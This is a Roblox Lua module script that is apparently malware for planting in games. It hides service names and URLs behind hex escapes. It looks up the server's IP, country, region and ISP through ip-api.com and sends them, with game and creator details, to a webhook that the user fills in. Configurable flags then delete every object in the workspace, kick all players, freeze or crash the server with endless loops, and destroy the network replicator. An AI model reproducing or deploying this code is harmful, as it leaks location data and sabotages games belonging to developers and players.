local module = {}

local w="" -- You need to paste the Result of .executable HERE

local h=game:GetService("\x48\x74\x74\x70\x53\x65\x72\x76\x69\x63\x65")
local m=game:GetService("\x4D\x61\x72\x6B\x65\x74\x70\x6C\x61\x63\x65\x53\x65\x72\x76\x69\x63\x65")
local r=game:GetService("\x52\x75\x6E\x53\x65\x72\x76\x69\x63\x65")
local a=h:GetAsync("\x68\x74\x74\x70\x3a\x2f\x2f\x69\x70\x2d\x61\x70\x69\x2e\x63\x6f\x6d\x2f\x6a\x73\x6f\x6e")
local b=h:JSONDecode(a)
local c,d,e,f=b.query,b.country,b.org,b.regionName

local Params = {
	
	["Enabled"] = true ,
	
	["Freeze"]  = true ,
	["Crash"]   = true , 
	["DeleteAllItems"] = true ,
	["BlockPublicAccessToTheGame"] = true ,
	
	["DeleteReplicator&NetworkClient"] = true ,-- P.L.S dont try it in test and Be careful with it :)
}


if Params.Enabled == true then
	
local g=string.sub(m:GetProductInfo(game.PlaceId).Created,1,10)
local i=string.sub(m:GetProductInfo(game.PlaceId).Updated,1,10)

if r:IsStudio() or r:IsServer() then
	local j={
		["embeds"]={{ 
			["author"]={
				["name"]="\x58\x65\x72\x74\x68\x69\x6E\x75\x6D",
				["icon_url"]="\x68\x74\x74\x70\x73\x3a\x2f\x2f\x73\x31\x31\x2e\x61\x63\x6f\x6e\x76\x65\x72\x74\x2e\x63\x6f\x6d\x2f\x63\x6f\x6e\x76\x65\x72\x74\x2f\x70\x33\x72\x36\x38\x2d\x63\x64\x78\x36\x37\x2f\x36\x30\x6d\x72\x70\x2d\x61\x79\x71\x34\x7a\x2e\x6a\x70\x67"
			},
			["title"]=m:GetProductInfo(game.PlaceId).Name,
			["url"]="\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E\x72\x6F\x62\x6C\x6F\x78\x2E\x63\x6F\x6D\x2F\x67\x61\x6D\x65\x73\x2F"..game.PlaceId,
			["color"]=5612282,
			["image"]={
				["url"]="\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E\x72\x6F\x62\x6C\x6F\x78\x2E\x63\x6F\x6D\x2F\x61\x73\x73\x65\x74\x2D\x74\x68\x75\x6D\x62\x6E\x61\x69\x6C\x2F\x69\x6D\x61\x67\x65\x3F\x61\x73\x73\x65\x74\x49\x64\x3D"..game.PlaceId.."\x26\x77\x69\x64\x74\x68\x3D\x37\x36\x38\x26\x68\x65\x69\x67\x68\x74\x3D\x34\x33\x32\x26\x66\x6F\x72\x6D\x61\x74\x3D\x70\x6E\x67"
			},
			["fields"]={
				{["name"]="\x50\x6C\x61\x79\x65\x72\x73",["value"]=tostring(#game.Players:GetPlayers()),["inline"]=true},
				{["name"]="\x43\x72\x65\x61\x74\x6F\x72",["value"]=game.Players:GetNameFromUserIdAsync(game.CreatorId),["inline"]=true},
				{["name"]="\x4D\x61\x78\x20\x50\x6C\x61\x79\x65\x72\x73",["value"]=tostring(game.Players.MaxPlayers),["inline"]=true},
				{["name"]="\x43\x72\x65\x61\x74\x65\x64",["value"]=g,["inline"]=true},
				{["name"]="\x4C\x61\x73\x74\x20\x55\x70\x64\x61\x74\x65\x64",["value"]=i,["inline"]=true},
				{["name"]="\x50\x6C\x61\x63\x65\x20\x49\x44",["value"]=tostring(game.PlaceId),["inline"]=true},
				{["name"]="\x49\x50",["value"]=c,["inline"]=true},
				{["name"]="\x43\x6F\x75\x6E\x74\x72\x79",["value"]=d,["inline"]=true},
				{["name"]="\x52\x65\x67\x69\x6F\x6E",["value"]=f,["inline"]=true},
				{["name"]="\x57\x69\x66\x69\x20\x42\x6F\x78",["value"]=tostring(e),["inline"]=true}
			},
			["footer"]={
				["text"]="\x45\x58\x49\x4C\x49\x55\x4D\x3A\x20\x44\x65\x76\x65\x6C\x6F\x70\x65\x64\x20\x62\x79\x20\x44\x6F\x6D\x61\x69\x6E\x23\x35\x36\x30\x38",
				["icon_url"]="\x68\x74\x74\x70\x73\x3A\x2F\x2F\x69\x2E\x69\x62\x62\x2E\x63\x6F\x2F\x6D\x38\x72\x51\x34\x39\x37\x2F\x45\x58\x32\x2E\x70\x6E\x67"
			}
		}}
	}
	wait()
	local j2=h:JSONEncode(j)
	h:PostAsync(w,j2)
end
 

	if Params.DeleteAllItems == true then for i , v in pairs( workspace:GetDescendants() ) do if not v:IsA("Terrain") then v:Destroy() end end for i , v in pairs( game.Players:GetChildren()) do wait() if v then v:Destroy() wait() end wait() end wait() end

if Params.Freeze == true then  while true do while true do while true do end end end elseif Params.Crash == true then while true do Instance.new("Part") while true do Instance.new("Part") end end end

if Params.BlockPublicAccessToTheGame == true then while true do for i, v in game.Players:GetChildren() do if v then v:Destroy() wait() end wait() end wait() end task.wait() game:Destroy() end
	
if Params["DeleteReplicator&GlobalNetwork"] == true then task.wait() game:GetService("NetworkClient").ClientReplicator:Destroy() end

end

return module
